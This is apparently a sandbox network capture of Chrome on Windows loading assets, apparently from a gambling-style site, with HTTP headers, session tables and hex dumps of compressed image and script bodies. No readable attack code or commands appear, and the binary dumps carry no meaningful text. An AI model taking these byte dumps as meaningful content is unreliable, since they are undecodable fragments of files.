                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC619INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 791405
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:14 GMT
                                                                                                                                                          ETag: "64c0a20a-c136d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[8],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,6],EU-FRA-paris-GLOBAL1-CACHE12[8],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,6],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473797
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 714acd5a2fdfa6b9644a1d7b569e384f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118203
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC15765INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckyd/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 11 34 2c 85 eb 77 47 35 dc 70 e7 72 f8 14 92 cf 3e 45 a8 7e b5 24 85 f2 32 30 fd 6b 6c eb 08 2d 92 d7 50 f6 17 f5 dc 3b 10 cd b8 0f d7 70 ec 42 15 a4 3f 5c 77 76 21 60 fd 71 dd d8 80 4f d7 3e ce b0 a1 a5 65 0c 26 d3 94 28 e7 88 c0 b7 48 f8 aa aa 51 6e 75 8b fd e1 2f cd db f7 ab 71 c6 00 f3 e4 e2 5f a4 7c 54 3a 51 ec 04 1c f1 18 77 84 54 4b 69 01 fa f9 6d ed 1f 15 9f 12 40 73 f2 db da 3e 2a d5 aa 9f 53 50 05 3c f9 38 97 e2 47 c5 5f 8d 17 b7 72 04 fd 77 0e c5 27 3e 4f 7b 0f d7 70 ec 50 d2 b2 86 50 07 3b c0 71 6f 05 0a aa bb 48 0f d7 6f 89 fb 6f 56 01 fa e3 bb b1 00 7e b8 ee ec 40 1f ae 3b bb 10 0c 3c ee 8f 35 0b 9c 28 e1 eb 8f 42 01 3f bc 4d 28 05 6b 81 a2 10 da 5b 87 eb 06 3a 86 97 76 7c fc 54 48 e5 5e e1 fa ea d0 88 c7 6b d1 f6 71 41 2b a0 92 e7 a9 f3 83
                                                                                                                                                          Data Ascii: 4,wG5pr>E~$20kl-P;pB?\wv!`qO>e&(HQnu/q_|T:QwTKim@s>*SP<8G_rw'>O{pPP;qoHooV~@;<5(B?M(k[:v|TH^kqA+
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 85 b6 20 23 97 31 31 42 48 05 c0 00 79 87 1c d9 01 a3 ec fc 85 df 77 e7 ac 72 90 8d c1 6c cc 9e 62 ed 5a dd a8 31 33 7c 03 82 07 4a a5 ef c1 49 29 49 e8 de e1 cf da b1 6e df 23 c9 89 5b e5 b9 68 69 b7 93 bf cf 29 52 a6 44 3a e7 75 57 7c a7 43 64 97 4d 8e 5b 98 e6 e7 2c 09 77 27 8c ab 4d 8c a5 51 55 ca 22 eb 42 81 bd 72 52 35 62 46 96 ab 97 23 3c 19 6b 4d cc 99 17 a9 3d 64 6a ae 9f 33 62 e0 85 b7 42 9f d7 e4 25 cb 93 31 ac 89 af 4b b1 03 bd 11 17 db cc a7 ae 44 4b 1d 91 a3 6c 39 b5 15 eb b9 91 5e 72 96 8c 5c ea cf 20 01 e8 a2 db 1f bb c8 ad b6 29 4a e4 c1 23 57 43 e2 3a 56 c6 65 39 dc 90 0e f9 fd b7 b2 02 a4 ae cf 55 08 61 8e 23 ec c5 01 0c ee 4c 1c 5d eb f6 21 8a 02 0f d4 17 23 54 a9 90 64 01 eb cb f3 4b b1 00 d3 75 f6 be 54 18 f8 20 0f 56 7b 7b fe 2b a1
                                                                                                                                                          Data Ascii: #11BHywrlbZ13|JI)In#[hi)RD:uW|CdM[,w'MQU"BrR5bF#<kM=dj3bB%1KDKl9^r\ )J#WC:Ve9Ua#L]!#TdKuT V{{+
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: ea ad 36 f7 2e 1b 65 7c bc 0b bf 9c aa a6 11 96 7d ce fd c8 4a 7e bc ce a2 e5 c9 ad 0d 38 ae 4f 91 9b 45 f5 21 7e e4 94 c4 2d 0a e3 dd 2f 5b 31 1e b4 c3 07 f2 ca 59 02 33 a1 55 ae 46 97 73 92 df b9 3a b9 a3 f5 6c 3e 3e f5 ce 4c c8 0b da 81 f9 41 f9 9d c5 4f 41 51 6b bb 28 84 74 e0 f9 d9 32 b8 bc ec 74 5c 94 79 6e 64 1b 9e e4 31 d2 d2 15 72 46 0d b1 87 5a c7 26 de 67 4f 35 97 d2 f6 37 e1 ed be d9 73 44 79 2b 76 8c 89 a1 90 12 2e 41 0c d5 65 91 7c 75 55 b4 d7 73 43 98 f7 0b be cd cb 0b 26 72 8c a2 c4 98 c4 0d 2d 5c 5b 20 42 8b 57 92 83 b3 1d f8 3e 4f 62 0b 3f 53 5b f7 13 2b 3e e1 6c 73 56 27 13 6e 5e a0 14 8e d0 6b 56 59 ba 35 b6 a6 bf 71 64 ff 00 0d 4a e5 a1 e4 3f 56 7b 20 f6 fe 74 f3 1c a4 4f e8 f9 81 ae dc 23 f2 c6 24 bb 71 60 a8 ea d6 e7 c6 7e f3 fb 67
                                                                                                                                                          Data Ascii: 6.e|}J~8OE!~-/[1Y3UFs:l>>LAOAQk(t2t\ynd1rFZ&gO57sDy+v.Ae|uUsC&r-\[ BW>Ob?S[+>lsV'n^kVY5qdJ?V{ tO#$q`~g
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 00 20 19 3c 3a 7c 0a 02 24 00 80 8a 78 8e 08 04 02 2d 52 5f ed b8 a0 1b 29 46 34 0e 68 ff 00 76 08 0a d2 bb b0 f6 90 c8 08 b5 cb 6f 72 01 18 ec 3d 45 00 18 d0 bc 4b 74 f1 40 33 4c 46 3d e7 e2 80 e6 fe a7 11 fd 05 96 67 fd 65 bc df ff 00 07 98 40 7a fe b8 9f c7 01 41 8b b6 03 b5 7c ea 3e 80 35 47 fd 6d be df 8a 90 2b 83 85 cb 7d bf 14 00 e0 63 72 1d bf 14 02 6a 8f fa db 7d bf 14 02 b8 38 5c b7 db f1 40 14 fc f0 ea 28 01 c0 c6 e4 3b 7e 28 04 d5 1f f5 b6 fb 7e 28 03 54 7f d6 db ed f8 a0 0d 51 ff 00 5b 6f b7 e2 80 35 47 fd 6d be df 8a 01 5c 1c 2e 5b ed f8 a0 0a 7e 78 75 14 00 e0 63 72 1d bf 14 00 e0 e1 72 df 6f c5 00 38 18 dc 87 6f c5 00 9a a3 fe b6 df 6f c5 00 6a 8f fa db 7d bf 14 01 aa 3f eb 6d f6 fc 50 06 a8 ff 00 ad b7 db f1 40 1a a3 fe b6 df 6f c5 00 6a
                                                                                                                                                          Data Ascii: <:|$x-R_)F4hvor=EKt@3LF=ge@zA|>5Gm+}crj}8\@(;~(~(TQ[o5Gm\.[~xucrro8ooj}?mP@oj
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 00 69 7e e7 96 dc 5d 63 42 51 f4 8f bc 0d 40 72 d7 b5 5b ac 74 c3 49 20 12 3c cc da bc a5 55 e5 a1 ad bf d8 ff 00 bc d9 ce 16 e5 76 92 dd 8f a5 fd ea e0 79 72 97 c1 96 0d 0c c3 10 e3 7b 2c fe e2 4e 4e 9c 3f ed 5f de 9d be ce 5a e8 ba 97 ad fd 29 ef 21 cc b9 3b c0 48 53 fb 30 70 6a 36 9c 49 2e a1 e6 aa d6 14 1d f5 ff 00 6a fe e1 8b 2f 2b a6 aa d1 76 3f 4a 7b 99 31 9f e8 f9 93 28 fe 11 1a 53 68 6a d1 3f d4 57 e8 7b 3f 1b fd b9 9a d6 f5 53 48 34 2c 7b 07 35 e5 03 94 bd 22 64 4c e4 63 38 88 c9 b4 69 00 06 c6 4b 2c b9 d3 aa 69 ea 99 f4 1f 1b f6 57 8d c7 18 71 fa 1b 9c b7 b1 5d 6d 57 62 61 18 88 86 11 2f aa 2e f9 3f 15 cb 7c 8d a9 4f 53 d5 a7 c1 a6 3d 5a 3a 2e 5b d9 b9 6b 76 c4 a4 0c dc ea 14 02 41 81 71 5c aa eb 2e 76 d8 e9 58 d2 50 d2 83 73 97 e4 b9 62 0c e3
                                                                                                                                                          Data Ascii: i~]cBQ@r[tI <Uvyr{,NN?_Z)!;HS0pj6I.j/+v?J{1(Shj?W{?SH4,{5"dLc8iK,iWq]mWba/.?|OS=Z:.[kvAq\.vXPsb
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 1e 5f e9 bb 92 d1 a8 16 00 87 63 e6 12 62 00 c2 ac 16 51 d1 f5 42 d8 9b 72 cd bf 6f fa 50 42 fc 24 20 63 2d 6e 25 a6 ae 5c 69 39 32 e3 c9 b4 f8 9b 57 0f 3d 2b 12 6e f3 1e c1 08 10 65 36 91 3a da 8c e0 33 52 ab 9a eb 43 4a e0 69 b5 6d a0 86 c7 b3 72 f7 39 ab 60 01 32 08 70 2a f5 8b ba ca 3b 9c bf 26 8b 17 c6 e7 d5 5b f2 67 41 73 d8 25 28 13 28 42 86 26 2e 03 e8 76 d2 4e d2 52 0f 01 64 79 2f 35 7d 4e 7f 99 f6 88 69 9c 88 b7 03 09 cc 88 93 88 12 88 ea 24 a1 d6 f1 5f 2d f8 24 f6 92 b7 2f c9 da 8c ee 6a d1 84 65 12 19 cc 8c a2 cf b0 b1 50 d4 e8 88 f9 38 32 2c 6b d2 db 9f d4 3d ce c5 be 5b 97 37 e5 21 52 44 40 c4 92 46 1b 98 23 69 68 4f c5 f8 f7 79 38 b4 d2 8f cc c4 8f b8 72 b6 88 f3 90 c0 1a 0a 12 e4 c8 75 f7 28 e5 1b ec 7b b4 fd b3 ee af 56 c5 fb 1f 52 f2 b6
                                                                                                                                                          Data Ascii: _cbQBroPB$ c-n%\i92W=+ne6:3RCJimr9`2p*;&[gAs%((B&.vNRdy/5}Ni$_-$/jeP82,k=[7!RD@F#ihOy8ru({VR
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 3a 86 b2 36 96 67 c4 64 ea 05 68 f5 95 d0 43 30 62 62 64 e4 4a 81 e9 e6 72 ee 0b a9 4e c9 fa 77 2a 93 ec 48 2f 68 11 6a d4 03 5c 0e 24 8d 82 8a ad 28 ff 00 98 86 bb 9a b6 39 8b 37 26 44 8b 19 33 c4 d1 a3 0a 91 5d b2 62 90 56 3a ad cd 51 6a dd f6 23 49 a1 76 c0 99 e0 4e 6e aa 9b 5b 90 9d 96 b6 d8 8e e7 b6 e8 87 a8 c2 3e 68 c4 0d 55 78 ea e9 c0 ab d7 d6 e2 47 25 d0 a9 2e 53 4d 74 b8 34 2c ef c0 ec a2 bb af 1d 77 22 64 88 f2 f1 c7 4d 44 a8 f9 47 6f 5a d6 94 ec b5 2b 6b 2a a9 72 3a 7c ad bd 23 f3 6a 04 66 33 ef 74 49 ab 4b 29 f7 ea ba 32 33 ca b3 c9 8b 98 91 87 0f 00 ab 93 6f 33 45 9e ad 6e 43 2e 44 17 11 81 c0 93 8b e2 f8 ac 4d 55 de e9 91 cb 91 20 45 a3 90 07 73 86 c3 8c 94 3a ce e8 de b9 5c 6a 41 3e 4a fc 43 88 01 12 c2 a3 28 82 2b fd 25 5e 24 ac ad b2 b9
                                                                                                                                                          Data Ascii: :6gdhC0bbdJrNw*H/hj\$(97&D3]bV:Qj#IvNn[>hUxG%.SMt4,w"dMDGoZ+k*r:|#jf3tIK)23o3EnC.DMU Es:\jA>JC(+%^$
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 52 5c 78 91 a0 c1 8e 3d 3b 14 0e 4d 6a 39 e2 49 0c 0d 1f 50 19 e1 99 08 55 c5 f4 b4 a1 a6 18 4a 32 12 3f 94 62 37 e2 70 6e d4 25 63 55 7e 9d c4 d1 2a 89 12 4b 7c c3 33 fb 10 b4 34 46 c0 c9 a8 1a 2e 29 bd 98 74 29 98 29 78 6b 55 28 49 33 44 44 16 c5 df 51 ae ea 30 44 cc 7e de 3f ee d8 90 19 c2 2f 6e ec ed 48 1d 5f d9 bc 76 e2 41 0e aa d5 1f b9 4a 3a 28 f2 e2 49 ac 8f 8f 45 26 ef 21 f5 6f d4 1e da 04 79 7f 73 e6 0c 23 84 2e 5c 37 6d 65 43 6e 41 cc 48 0d 8a c2 df 07 e3 e5 d5 2e 36 3d 3c 1f bd fe ed f1 fd 38 ef e8 ec 76 1c af f1 32 f5 cd 11 f7 6f 68 e4 f9 c7 26 37 2f 72 f1 fd 2d c2 08 ab b6 b7 a2 e3 c9 fb 73 4d f0 7a 9e b6 0f f7 55 f1 e9 f2 2a ec cd fb 7f 51 7d 15 ee 6f 19 5c e6 7d aa e3 56 37 23 ea 5a 7d 55 8f ab 90 73 b3 25 c5 6f 87 f2 a9 79 d6 d5 f0 3d 6c
                                                                                                                                                          Data Ascii: R\x=;Mj9IPUJ2?b7pn%cU~*K|34F.)t))xkU(I3DDQ0D~?/nH_vAJ:(IE&!oys#.\7meCnAH.6=<8v2oh&7/r-sMzU*Q}o\}V7#Z}Us%oy=l
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: ac 8e f0 aa 4d 71 bb 38 14 73 bc d4 86 ad 73 88 da 2a 49 19 1d cb 4c 6d 4e fd 0b 5b 0f 14 3e df 3d cc 02 3c f2 93 17 0e e2 b5 19 d3 35 ac d7 b9 cd 6c 0a cb 5d 0b 96 bd c6 e5 b9 83 ea 4f 6e 9d 59 3e 38 d4 a9 39 6d 8d ab 71 ae a6 c7 2f ef 57 28 35 98 81 27 d9 42 f5 27 30 5d 07 db b9 a7 0f 77 94 98 dc ba 48 ca 84 d7 6e 2a d5 69 3d 4b 52 96 4e 59 29 e7 e1 20 03 be 07 cc e1 87 8b ad 39 a3 4e 3d 8c fb b7 4c 84 d8 d4 be c6 6a 9c 4a ba bd 5a 85 b9 83 dd 99 5c c4 05 d8 87 c4 30 39 ee 3b 5c 14 fa 9a f2 7a 7d bd ce 7f 98 f6 f8 bb c0 d7 16 27 06 72 46 dc d6 17 aa eb b1 bd 73 5a a9 4e e6 24 ed dd b5 af 06 72 40 a1 e0 b9 ef 8d ef fd 27 6d 73 2b 2f 56 ac 5b 73 3a 4c 4c 88 05 d9 99 df ec 52 8a af 4b 6d 06 56 71 a9 14 e8 e6 44 98 b1 2f a8 10 e7 68 c4 15 95 91 ad 2d 65 b7
                                                                                                                                                          Data Ascii: Mq8ss*ILmN[>=<5l]OnY>89mq/W(5'B'0]wHn*i=KRNY) 9N=LjJZ\09;\z}'rFsZN$r@'ms+/V[s:LLRKmVqD/h-e


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          408192.168.2.55017423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC655OUTGET /pc/image-pc/index/382/button/icon_member_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1940
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:10 GMT
                                                                                                                                                          ETag: "64c0a206-794"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE26[3],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473797
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1e70bf7b994438b731676c9baec7217e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118203
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC1940INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR%% tEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          409192.168.2.550183188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC408OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          If-None-Match: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          2024-06-09 22:41:12 UTC658INHTTP/1.1 304 Not Modified
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvmyrnnAdlT5l4w9HXSyehDisk7awO6SC%2Bp4kKFVsRk9aE9TeICyWHAPJEgHF8K9zaXGscLSzHWVcSMAX2TZOJ%2F21DEsFa%2BeYXalzKcx3RvcDHd4qJWlcdqtsxoU7Op%2Bcyw1VakoKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0b4ab212e55-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          410192.168.2.550168183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC579OUTGET /061410/rcenter/common/static/js/gb.validation.min.js?v=1716975949157 HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC718INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 5207
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-23
                                                                                                                                                          ETag: W/"633d510e-7fd7"
                                                                                                                                                          Date: Thu, 06 Jun 2024 18:42:31 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 18:42:31 GMT
                                                                                                                                                          Age: 273521
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-23
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-10
                                                                                                                                                          X-Cdn-Request-ID: ec9b564760a612f86d5dc5421c0d85b1
                                                                                                                                                          2024-06-09 22:41:12 UTC5207INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 6b 8f 1c c7 71 df f5 2b 46 c3 d8 bb cb 7d de 8b 22 77 79 07 d0 22 0f 36 62 c7 8a 29 24 36 48 e1 30 b7 db bb 37 e6 ee cc 66 66 96 77 27 fa 00 27 5f 6c 18 0e 24 21 88 05 04 10 82 00 4e 10 04 30 9d 20 41 8c d8 92 f2 63 a2 a3 e8 4f f9 0b a9 ea c7 cc f4 4c 77 4f cf de 92 94 1c 35 2c f3 6e ba bb aa ba bb ba ba aa ba aa af 39 5d 05 e3 c4 0f 03 a7 39 ee 38 8b 8e 13 75 9c a4 e5 3c 79 cd 81 f2 d8 8b 9c d0 d9 77 b2 36 49 c7 f1 45 2d 96 e4 c4 8f 7b 7f 44 e6 64 41 82 04 5a 42 3d fd 34 21 53 6f 35 4f 62 f8 94 35 a6 1d ce 97 64 e8 6c 75 a4 8f 8b 70 02 1f dd a9 7f 46 26 ae 5c f5 f8 bb d3 69 4c 92 a1 b3 57 f8 7e 7f e9 8d 49 e9 33 39 5b ce 3d 3f 00 60 97 ef 7f 70 f9 de bf 3f fb dd 07 97 3f fb e7 cb a7 3f 7f f6 d3 f7 7f ff 2f 3f 7f fe eb
                                                                                                                                                          Data Ascii: =kq+F}"wy"6b)$6H07ffw''_l$!N0 AcOLwO5,n9]98u<yw6IE-{DdAZB=4!So5Ob5dlupF&\iLW~I39[=?`p???/?


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          411192.168.2.55018290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC637OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE1[330],EU-GER-frankfurt-GLOBAL1-CACHE6[323,TCP_MISS,328],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d0c50ed2b9798a8757d6c045451f4707
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814502
